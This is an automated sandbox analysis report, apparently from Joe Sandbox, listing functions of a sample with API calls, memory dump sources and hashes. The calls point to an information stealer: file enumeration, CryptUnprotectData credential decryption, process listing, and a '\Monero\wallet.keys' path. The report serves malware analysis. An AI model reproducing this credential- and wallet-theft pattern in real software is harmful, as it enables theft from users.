                    Function 00F7C40B Relevance: 10.3, Strings: 7, Instructions: 1570COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: FP9O$FP9O$VsfD$WV=y$h/$r>7{$we?s
                    • API String ID: 0-3137143347
                    • Opcode ID: 8372acc3f7e305b0484b5f5ef06f45da827abf3941ac6c4b080bf2c423f28fa2
                    • Instruction ID: 8f29e36c386c67e663b01136c36888d7c13e02f886d3abff06adde71dbc12805
                    • Opcode Fuzzy Hash: 8372acc3f7e305b0484b5f5ef06f45da827abf3941ac6c4b080bf2c423f28fa2
                    • Instruction Fuzzy Hash: 07B2E3B3A0C2009FE304AE29DC8567AFBE5EF94720F16493DE6C4C7744EA3598458B97
                    Function 00F8301E Relevance: 10.3, Strings: 7, Instructions: 1563COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: )A}$<+F;$@G{o$N[Dw$R<d$_B;$}0d
                    • API String ID: 0-859064206
                    • Opcode ID: b6c4a8b6ee565442b3a41038b1d5b82e211e2a59c82b0a48830f4e4dafbc052d
                    • Instruction ID: c9612585b55d8ee04648aa67f3bd8c8aac29593622c62ab548496817dd8a8a04
                    • Opcode Fuzzy Hash: b6c4a8b6ee565442b3a41038b1d5b82e211e2a59c82b0a48830f4e4dafbc052d
                    • Instruction Fuzzy Hash: DFB2F5F3A0C2049FE304AE29EC8577AF7E5EF94720F1A493DEAC483744EA3558058697
                    Function 00BCE430 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                      • Part of subcall function 00BDA920: lstrcpy.KERNEL32(00000000,?), ref: 00BDA972
                      • Part of subcall function 00BDA920: lstrcat.KERNEL32(00000000), ref: 00BDA982
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BE0D73), ref: 00BCE4A2
                    • StrCmpCA.SHLWAPI(?,00BE14F8), ref: 00BCE4F2
                    • StrCmpCA.SHLWAPI(?,00BE14FC), ref: 00BCE508
                    • FindNextFileA.KERNEL32(000000FF,?), ref: 00BCEBDF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                    • String ID: \*.*
                    • API String ID: 433455689-1173974218
                    • Opcode ID: abdaf73f85e09fd795d7355d25d10c24a8347fdb7c5701a1531037470b40a0c0
                    • Instruction ID: 440e8f189655a46c64bc6f31dc3f31f2ae6653caf230190287236122e55e4527
                    • Opcode Fuzzy Hash: abdaf73f85e09fd795d7355d25d10c24a8347fdb7c5701a1531037470b40a0c0
                    • Instruction Fuzzy Hash: 121253719101189ADB14FB60DCA6EEDB3B8AF54300F4045EAB50AA2291FF356F49CF96
                    Function 00F8B98F Relevance: 8.6, Strings: 6, Instructions: 1107COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: !L:$+Q-o$L~/$XJ{$prW7$/ X
                    • API String ID: 0-1845434315
                    • Opcode ID: 939cb30bcca18f939fef13bb9b53650a183bf6d1f137a5cc6350e90673ba04e6
                    • Instruction ID: 7a1b5e73110b89a2780a7953abb57e609f9fcc263000b1469fc44004af333ad4
                    • Opcode Fuzzy Hash: 939cb30bcca18f939fef13bb9b53650a183bf6d1f137a5cc6350e90673ba04e6
                    • Instruction Fuzzy Hash: 5B7207F360C2049FE3046E2DEC8567AF7E9EF94720F1A863DE6C483744EA3558458796
                    Function 00F7F904 Relevance: 7.9, Strings: 5, Instructions: 1663COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: E;O$fj$z7$tq}w$y1S;
                    • API String ID: 0-1170751594
                    • Opcode ID: ddd43219d8a78af3428973c6227ddd66196aeb18dd10d1e48549b2065b5fbff8
                    • Instruction ID: 4896fdff101c6fe55e7218141ca04db78263a3d5e08105b23fbc47bde1cd01d3
                    • Opcode Fuzzy Hash: ddd43219d8a78af3428973c6227ddd66196aeb18dd10d1e48549b2065b5fbff8
                    • Instruction Fuzzy Hash: 9EB22AF3A082149FE304AE2DDC8566AF7E9EF94720F1A493DE6C4C3744EA3598058697
                    Function 00F814E9 Relevance: 7.8, Strings: 5, Instructions: 1597COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: 2Ok$E_sw$OW_~$Y[e\$zl_m
                    • API String ID: 0-4047140572
                    • Opcode ID: bd63c1ef630c6262ff9454d3bb8680bb82d722d513300b9e8fb2cf6cd5b2ade2
                    • Instruction ID: aacd9f3968a6da0779c746db9e80ced586dd0c7d3943513a7f0c43b12a31ad91
                    • Opcode Fuzzy Hash: bd63c1ef630c6262ff9454d3bb8680bb82d722d513300b9e8fb2cf6cd5b2ade2
                    • Instruction Fuzzy Hash: 29B206F360C6049FE3086E2DEC8567ABBEAEF94320F1A493DE6C5C7344EA3558058657
                    Function 00BCC820 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 00BCC871
                    • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 00BCC87C
                    • lstrcat.KERNEL32(?,00BE0B46), ref: 00BCC943
                    • lstrcat.KERNEL32(?,00BE0B47), ref: 00BCC957
                    • lstrcat.KERNEL32(?,00BE0B4E), ref: 00BCC978
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: lstrcat$BinaryCryptStringlstrlen
                    • String ID:
                    • API String ID: 189259977-0
                    • Opcode ID: 7e5a16bf4e08379e2945133fc09bdfa78468b861461bbda67c5371aaa6640d3a
                    • Instruction ID: e0684b0294fb69e0f279ee2d7f22d9a8e473853ef656a4826edd4e328c390761
                    • Opcode Fuzzy Hash: 7e5a16bf4e08379e2945133fc09bdfa78468b861461bbda67c5371aaa6640d3a
                    • Instruction Fuzzy Hash: 21415E7590421EDFDB10DFA0DD89BFEBBB8BB48304F1441A8E509A6280D7B55A84CF92
                    Function 00BC7240 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                    Download Yara Rule
                    APIs
                    • GetProcessHeap.KERNEL32(00000008,00000400), ref: 00BC724D
                    • RtlAllocateHeap.NTDLL(00000000), ref: 00BC7254
                    • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00BC7281
                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00BC72A4
                    • LocalFree.KERNEL32(?), ref: 00BC72AE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                    • String ID:
                    • API String ID: 2609814428-0
                    • Opcode ID: b94fd1ada8fb7d55bf1b960e1dd086852abb2ba87e235f6cac0867afe5f5bf75
                    • Instruction ID: db07927a8f5f6402e8eb23192a2c4f10936d5e10342b905cad42772fc4f797d8
                    • Opcode Fuzzy Hash: b94fd1ada8fb7d55bf1b960e1dd086852abb2ba87e235f6cac0867afe5f5bf75
                    • Instruction Fuzzy Hash: 27014071A40308BFEB14DBD4CD49F9D77B8EB44700F148058FB05BA2C0CAB1AA448B65
                    Function 00BD9600 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BD961E
                    • Process32First.KERNEL32(00BE0ACA,00000128), ref: 00BD9632
                    • Process32Next.KERNEL32(00BE0ACA,00000128), ref: 00BD9647
                    • StrCmpCA.SHLWAPI(?,00000000), ref: 00BD965C
                    • CloseHandle.KERNEL32(00BE0ACA), ref: 00BD967A
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                    • String ID:
                    • API String ID: 420147892-0
                    • Opcode ID: c6d576489be61294f14666172ae6929fceba1117ee9deefc7de74a95928f1d84
                    • Instruction ID: dedd8fed2497fd529b0998a9b929dfa9882230ad8c2cf3dacfd85ceaa4a62269
                    • Opcode Fuzzy Hash: c6d576489be61294f14666172ae6929fceba1117ee9deefc7de74a95928f1d84
                    • Instruction Fuzzy Hash: 6E01E975A00208AFDB14DFA5C988BEDB7F8EB48700F148199A905A6240E7759A84CF51
                    Function 00F7A999 Relevance: 6.6, Strings: 4, Instructions: 1607COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bc0000_file.jbxd
                    Yara matches
                    Similarity
                    • API ID:
                    • String ID: #)r$.T<O$4w,$kz
                    • API String ID: 0-4195102005
                    • Opcode ID: cd554acc4e5604051a7080d3ff0d288fa7c97e42eeb479feb215166064da22a8
                    • Instruction ID: fdee92c980fd0e8bb6cba50b291c8b638a671ab587bc9d1046836a4bf6919c63
                    • Opcode Fuzzy Hash: cd554acc4e5604051a7080d3ff0d288fa7c97e42eeb479feb215166064da22a8
                    • Instruction Fuzzy Hash: 0FB205F360C204AFE3046E2DEC8567AFBE9EF94720F1A493DEAC483744E63558458697
                    Function 00BD8680 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00BDA740: lstrcpy.KERNEL32(00BE0E17,00000000), ref: 00BDA788
                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00BE05B7), ref: 00BD86CA
                    • Process32First.KERNEL32(?,00000128), ref: 00BD86DE
                    • Process32Next.KERNEL32(?,00000128), ref: 00BD86F3
                      • Part of subcall function 00BDA9B0: lstrlen.KERNEL32(?,013C9238,?,\Monero\wallet.keys,00BE0E17), ref: 00BDA9C5
                      • Part of subcall function 00BDA9B0: lstrcpy.KERNEL32(00000000), ref: 00BDAA04
                      • Part of subcall function 00BDA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00BDAA12
                      • Part of subcall function 00BDA8A0: lstrcpy.KERNEL32(?,00BE0E17), ref: 00BDA905
                    • CloseHandle.KERNEL32(?), ref: 00BD8761
                    Memory Dump Source
                    • Source File: 00000000.00000002.1747919128.0000000000BC1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BC0000, based on PE: true
                    • Associated: 00000000.00000002.1747719148.0000000000BC0000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C71000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000C7D000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1747919128.0000000000E0A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000E1E000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000000F97000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000106B000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.0000000001090000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.000000000109A000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749282027.00000000010A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749524358.00000000010A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749615998.0000000001234000.00000040.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1749634982.0000000001235000.00000080.00000001.01000000.00000003.sdmpDownload File
